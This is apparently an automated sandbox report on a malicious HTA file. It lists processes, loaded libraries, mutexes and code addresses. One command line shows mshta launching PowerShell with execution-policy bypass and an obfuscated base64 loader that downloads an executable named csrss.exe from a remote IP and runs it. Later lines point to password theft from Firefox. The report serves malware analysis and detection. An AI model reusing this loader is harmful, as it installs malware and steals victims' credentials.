Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30C90E59
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30D4EE26
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30C82FC8
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30C9CFE0
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30C91F92
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30D4FFB1
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30D04F40
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30D4FF09
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CD2F28
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CB0F30
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_1_00401250
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_1_00403060
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_1_00402019
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_1_00403160
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_1_00402249
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_1_00401BF0
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_1_00401D69
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_1_00401D70
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_1_00401F69
Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_1_00401F88
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: 21_2_043CF43F
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: 21_2_04301460
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: 21_2_043C2446
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: 21_2_043BE4F6
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: 21_2_04310535
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: 21_2_043C7571
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: 21_2_043AD5B0
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: 21_2_043D0591
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: 21_2_0432C6E0
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: 21_2_043C16CC
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: 21_2_04310770
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: 21_2_04334750
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: 21_2_043CF7B0
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: 21_2_043C70E9
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: 21_2_043CF0E0
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: 21_2_043170C0
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: 21_2_043BF0CC
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: 21_2_043AA118
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: 21_2_04300100
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: 21_2_043DB16B
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: 21_2_042FF172
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: 21_2_0431B1B0
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: 21_2_043D01AA
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: 21_2_043C81CC
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: 21_2_043B0274
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: 21_2_043152A0
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: 21_2_043B12ED
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: 21_2_0432B2C0
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: 21_2_043C132D
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: 21_2_042FD34C
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: 21_2_043CA352
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: 21_2_0435739A
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_0431E3F021_2_0431E3F0
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_043D03E621_2_043D03E6
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_04389C3221_2_04389C32
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_04310C0021_2_04310C00
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_043B0CB521_2_043B0CB5
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_04300CF221_2_04300CF2
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_043CFCF221_2_043CFCF2
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_0431AD0021_2_0431AD00
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_043C7D7321_2_043C7D73
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_043C1D5A21_2_043C1D5A
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_04313D4021_2_04313D40
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_04328DBF21_2_04328DBF
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_0430ADE021_2_0430ADE0
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_0432FDC021_2_0432FDC0
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_043CEE2621_2_043CEE26
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_04310E5921_2_04310E59
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_04319EB021_2_04319EB0
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_04322E9021_2_04322E90
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_043CCE9321_2_043CCE93
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_043CEEDB21_2_043CEEDB
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_04330F3021_2_04330F30
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_043CFF0921_2_043CFF09
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_04384F4021_2_04384F40
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_043CFFB121_2_043CFFB1
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_04311F9221_2_04311F92
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_0431CFE021_2_0431CFE0
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_04302FC821_2_04302FC8
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_0431284021_2_04312840
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_0431A84021_2_0431A840
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_042F68B821_2_042F68B8
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_0433E8F021_2_0433E8F0
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_043138E021_2_043138E0
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_0432696221_2_04326962
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_0431995021_2_04319950
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_0432B95021_2_0432B950
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_043129A021_2_043129A0
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_043DA9A621_2_043DA9A6
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_04383A6C21_2_04383A6C
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_043CFA4921_2_043CFA49
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_043C7A4621_2_043C7A46
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_04355AA021_2_04355AA0
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_043ADAAC21_2_043ADAAC
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_0430EA8021_2_0430EA80
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_043BDAC621_2_043BDAC6
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_043CFB7621_2_043CFB76
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_043CAB4021_2_043CAB40
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_0432FB8021_2_0432FB80
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_043C6BD721_2_043C6BD7
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_02411CC021_2_02411CC0
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_0241534021_2_02415340
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_0241354021_2_02413540
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_0241353B21_2_0241353B
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_0240CB7021_2_0240CB70
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_0242B9A021_2_0242B9A0
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_0240AED421_2_0240AED4
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_0240AEE021_2_0240AEE0
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_0240AD8921_2_0240AD89
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_0240AD9021_2_0240AD90
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_0240CD9021_2_0240CD90
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_041CE77321_2_041CE773
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_041CE2B421_2_041CE2B4
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_041CE3D321_2_041CE3D3
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_041CD83821_2_041CD838
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_041D38FB21_2_041D38FB
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_041CCAF321_2_041CCAF3
Source: Joe Sandbox View | Dropped File: C:\Users\user\Links\iaoqralA.pif 7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
Source: C:\Users\user\Links\iaoqralA.pif | Code function: String function: 30D0F290 appears 105 times
Source: C:\Users\user\Links\iaoqralA.pif | Code function: String function: 30CD7E54 appears 88 times
Source: C:\Users\user\Links\iaoqralA.pif | Code function: String function: 30C7B970 appears 266 times
Source: C:\Users\user\Links\iaoqralA.pif | Code function: String function: 30CC5130 appears 36 times
Source: C:\Users\user\Links\iaoqralA.pif | Code function: String function: 30CFEA12 appears 84 times
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: String function: 0437EA12 appears 84 times
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: String function: 04345130 appears 36 times
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: String function: 04357E54 appears 88 times
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: String function: 0438F290 appears 105 times
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: String function: 042FB970 appears 266 times
Source: C:\Users\user\AppData\Roaming\csrss.exe | Code function: String function: 03804414 appears 246 times
Source: C:\Users\user\AppData\Roaming\csrss.exe | Code function: String function: 03813F9C appears 54 times
Source: C:\Users\user\AppData\Roaming\csrss.exe | Code function: String function: 0380421C appears 66 times
Source: C:\Users\user\AppData\Roaming\csrss.exe | Code function: String function: 0380457C appears 804 times
Source: C:\Users\user\AppData\Roaming\csrss.exe | Code function: String function: 03814018 appears 45 times
Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winHTA@29/24@16/11
Source: C:\Users\user\AppData\Roaming\csrss.exe | Code function: 12_2_03807B0E GetDiskFreeSpaceA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\csrss[1].exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7740:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7784:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5708:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yeu4nxga.cn4.ps1
Source: C:\Users\user\AppData\Roaming\csrss.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Roaming\csrss.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\mshta.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: systeminfo.exe, 00000015.00000002.3625591179.000000000251A000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 00000015.00000003.1746011563.000000000251A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: fgd.hta | Virustotal: Detection: 42%
Source: fgd.hta | ReversingLabs: Detection: 30%
Source: unknown | Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\fgd.hta"
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwershELl.ExE -EX BypasS -nOp -W 1 -c DEVICeCrEDEnTIALdEPLoyMeNT.Exe ; iex($(iEX('[SyStem.tExt.ENCOdInG]'+[ChAR]0X3A+[ChAR]58+'Utf8.getsTRing([sYsTEm.CONveRt]'+[chAR]58+[cHaR]58+'FROmbasE64string('+[Char]34+'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'+[cHaR]0x22+'))')))"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwershELl.ExE -EX BypasS -nOp -W 1 -c DEVICeCrEDEnTIALdEPLoyMeNT.Exe ; iex($(iEX('[SyStem.tExt.ENCOdInG]'+[ChAR]0X3A+[ChAR]58+'Utf8.getsTRing([sYsTEm.CONveRt]'+[chAR]58+[cHaR]58+'FROmbasE64string('+[Char]34+'JGMxS3luICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTWJlcmRFRklOaXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbW9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERock8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeGpiLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFIsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHR1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJnaVNLZHFIUUUpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJZT2giICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhaUFogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGMxS3luOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjYuMTQzLzQ3MC9jc3Jzcy5leGUiLCIkRW52OkFQUERBVEFcY3Nyc3MuZXhlIiwwLDApO1N0YVJULXNsZWVQKDMpO2luVk9LRS1JdEVtICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxjc3Jzcy5leGUi'+[cHaR]0x22+'))')))"
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\z0uhqkog\z0uhqkog.cmdline"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5F1A.tmp" "c:\Users\user\AppData\Local\Temp\z0uhqkog\CSCA33479D5CCDF488DBD48FF689C9305B.TMP"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Roaming\csrss.exe "C:\Users\user\AppData\Roaming\csrss.exe"
Source: C:\Users\user\AppData\Roaming\csrss.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\\ProgramData\\7591.cmd
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\csrss.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\\ProgramData\\37991.cmd
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\csrss.exe | Process created: C:\Users\user\Links\iaoqralA.pif C:\\Users\\user\\Links\iaoqralA.pif
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exe | Process created: C:\Windows\SysWOW64\systeminfo.exe "C:\Windows\SysWOW64\systeminfo.exe"
Source: C:\Windows\SysWOW64\systeminfo.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: mshtml.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: msiso.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: srpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: msimtf.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: resourcepolicyclient.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dataexchange.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: d3d11.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dcomp.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: d2d1.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dwrite.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: slc.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kdscli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntmarta.dll
                        Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\svchost.exe | Section loaded: qmgr.dll
